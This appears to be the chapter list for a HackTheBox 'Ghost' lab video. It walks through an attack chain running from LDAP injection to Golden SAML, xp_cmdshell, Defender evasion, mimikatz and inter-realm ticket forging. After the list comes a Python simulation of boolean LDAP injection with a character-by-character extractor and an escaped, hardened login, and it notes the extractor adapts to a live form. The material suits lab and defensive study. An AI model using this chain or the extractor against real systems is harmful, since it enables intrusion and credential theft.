HackTheBox - Ghost

IppSec 11,861 views 1 month ago

00:00 - Intro
01:00 - Start of nmap
05:20 - Taking a look at all the websites
06:45 - Showing why you should be careful when enumerating VHOSTS, also using gobuster in DNS mode since there are multiple web services and a DNS Server
12:45 - Discovering LDAP Injection in intranet page
15:40 - Showing how our LDAP Injection is boolean injection which lets us enumerate data in LDAP
21:30 - Creating a python program to perform the boolean injection
33:15 - Got the password for gitea_temp_principal
35:00 - Looking at the Intranet backend code that was in Gitea, which is written in Rust using the Rocket web library, and finding an RCE, but it is protected by auth
41:00 - Looking at the Blog project in Gitea, which shows there is a modification to the Ghost CMS application that has a file disclosure vulnerability
45:30 - Exploiting the file disclosure in the blog, downloading the SQLite database, grabbing the API key from the environment, and then getting a shell through the Rust API
50:00 - Shell returned on the intranet container, discovering an SSH ControlMaster socket, which lets us SSH into the dev workstation without a password
56:00 - On the workstation, Florence.Ramirez has a Kerberos ticket; downloading it and then testing it
58:30 - Running BloodHound, which is giving us trouble because of some weird connection issues, as Impacket isn't trying all the IPs given for a DC
01:09:20 - Editing our BloodHound collector to hardcode the IP address, which is a really hacky thing to do, but it worked. Then looking at BloodHound and not seeing much
01:17:20 - Using dnstool to create a DNS record on the domain controller, then Responder to capture the hash of a user trying to connect to that name
01:21:00 - Got Justin.Bradley's password; he can dump the gMSA password, getting the ADFS service account's password
01:27:15 - Dumping the ADFS data (ADFSDump), then using ADFSpoof to perform the Golden SAML attack and impersonate Administrator on a federated web login
01:42:00 - Logged into core as administrator, which is an MSSQL shell. Enumerating the database, discovering linked servers, enumerating permissions, discovering we can impersonate SA, then enabling and running xp_cmdshell for RCE
02:01:10 - Editing our PowerShell script to bypass Defender by renaming a bunch of variables. Using EFSPotato to escalate from the service account to SYSTEM
02:13:00 - SYSTEM on the corp DC, which has a bidirectional trust
02:17:36 - Using mimikatz to dump the Ghost$ trust account, which the parent domain trusts, then using ticketer to create a TGT that abuses this inter-realm trust to claim we can access the parent domain
02:20:50 - Using getST with that ticket to request a service ticket (TGS) for DC01's CIFS service, then running secretsdump to dump all the credentials
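The boolean LDAP injection covered from 12:45 to 33:15 works because the intranet login splices the submitted username into an LDAP search filter without escaping, so a username that closes its own assertion and opens a new one turns the login's yes/no answer into an oracle on any filterable attribute. The block below is an added, self-contained illustration and is not IppSec's script or the box's real intranet code: the filter shape `(&(sAMAccountName=…)(userPassword=…))`, the attribute being read (`description`), the directory contents and the in-process filter evaluator are all constructed for the example. It puts the vulnerable login beside an RFC 4515-escaped version, and `extract_attribute` recovers a value one character at a time by sending prefix-wildcard guesses and stopping when no character extends the match.

```python
"""Boolean LDAP injection, simulated offline against a constructed directory."""
import re
import string

# Constructed data; the secret is assumed to sit in a readable, filterable
# attribute (here "description"), which the page does not state.
SECRET = "Constructed-Demo-Secret_01"
DIRECTORY = [
    {"sAMAccountName": "gitea_temp_principal", "userPassword": SECRET,
     "description": SECRET},
    {"sAMAccountName": "florence.ramirez", "userPassword": "Another-Demo-Secret_02",
     "description": "Workstation user"},
]

def _unescape(literal):
    """Decode RFC 4515 \\XX hex escapes inside a literal filter segment."""
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), literal)

def _match(value, pattern):
    """Match an attribute value against an assertion value with '*' wildcards."""
    parts = [_unescape(p) for p in pattern.split("*")]
    if len(parts) == 1:
        return value == parts[0]
    head, tail = parts[0], parts[-1]
    if len(value) < len(head) + len(tail):
        return False
    if not (value.startswith(head) and value.endswith(tail)):
        return False
    pos, end = len(head), len(value) - len(tail)
    for part in parts[1:-1]:
        idx = value.find(part, pos, end)
        if idx < 0:
            return False
        pos = idx + len(part)
    return True

def parse_filter(s, i=0):
    """Recursive-descent parser for (&..), (|..), (!..) and (attr=value)."""
    if s[i] != "(":
        raise ValueError("expected '(' at offset %d" % i)
    i += 1
    if s[i] in "&|!":
        op, subs, i = s[i], [], i + 1
        while s[i] == "(":
            node, i = parse_filter(s, i)
            subs.append(node)
        if s[i] != ")":
            raise ValueError("expected ')' at offset %d" % i)
        return (op, subs), i + 1
    eq = s.index("=", i)
    close = s.index(")", eq)
    return ("=", s[i:eq], s[eq + 1:close]), close + 1

def _evaluate(node, entry):
    op = node[0]
    if op in "&|!":
        results = [_evaluate(n, entry) for n in node[1]]
        return all(results) if op == "&" else any(results) if op == "|" else not results[0]
    value = entry.get(node[1])
    return value is not None and _match(value, node[2])

def _search(ldap_filter):
    """True if any entry matches; the whole string must parse as one filter."""
    node, end = parse_filter(ldap_filter)
    if end != len(ldap_filter):
        raise ValueError("trailing data after filter")
    return any(_evaluate(node, e) for e in DIRECTORY)

def vulnerable_login(username, password):
    """The bug: raw input is spliced into the filter (filter shape is assumed)."""
    return _search(f"(&(sAMAccountName={username})(userPassword={password}))")

def escape_filter_value(value):
    """RFC 4515 escaping of * ( ) \\ and NUL in an assertion value."""
    return "".join("\\%02x" % ord(c) if c in "*()\\\0" else c for c in value)

def hardened_login(username, password):
    """Same query, but every assertion value is escaped first."""
    return _search("(&(sAMAccountName=%s)(userPassword=%s))"
                   % (escape_filter_value(username), escape_filter_value(password)))

# Guessable characters; * ( ) \ are left out as they would alter the filter's structure.
CHARSET = string.ascii_letters + string.digits + "_-!@#$%^&.,:;=+/? "

def extract_attribute(login, target_user, attr, charset=CHARSET, max_len=64):
    """Recover `attr` of `target_user` one character at a time from the login's
    true/false answer: each guess closes the sAMAccountName assertion early and
    appends a prefix-wildcard assertion on `attr`, with a bare '*' as password.
    Returns None if the value cannot be confirmed exactly (a character outside
    `charset`, or a login that escapes input so the oracle never says true)."""
    found = ""
    while len(found) < max_len:
        for ch in charset:
            if login(f"{target_user})({attr}={found}{ch}*", "*"):
                found += ch
                break
        else:
            break
    return found if login(f"{target_user})({attr}={found}", "*") else None
```

Against a real target the `login` callable would POST the two fields to the intranet form and map the success/failure page to True/False; everything else stays the same. Two caveats the toy glosses over: most Active Directory string attributes match case-insensitively, so the recovered value may need its letter case brute-forced before it works as a password, and a payload that unbalances the parentheses makes `_search` raise here, just as a real server returns a protocol error, which is a distinguishable third response and can leak structure on its own.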
